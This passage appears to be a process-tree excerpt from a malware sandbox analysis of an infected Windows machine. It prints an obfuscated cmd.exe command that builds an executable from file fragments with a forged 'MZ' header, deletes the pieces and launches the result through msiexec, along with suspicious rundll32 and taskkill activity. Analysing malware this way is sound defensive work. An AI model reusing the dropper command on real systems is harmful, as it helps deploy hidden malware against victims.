                    Command line: "C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 &eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S+2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW
                    PID: 1272

                    C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" eChO "
                      PID: 5108

                    C:\Windows\SysWOW64\cmd.exe
                      Command line: C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"
                      PID: 4908

                    C:\Windows\SysWOW64\msiexec.exe
                      Command line: msiexec.exe -y ..\vFEGMW.QlW
                      PID: 4724

              C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill /f -im "Sun07b9107c074617.exe"
                - Kills process with taskkill
                PID: 4128

      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 588
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3076

C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  PID: 4180

  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    PID: 4224

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService
  PID: 4424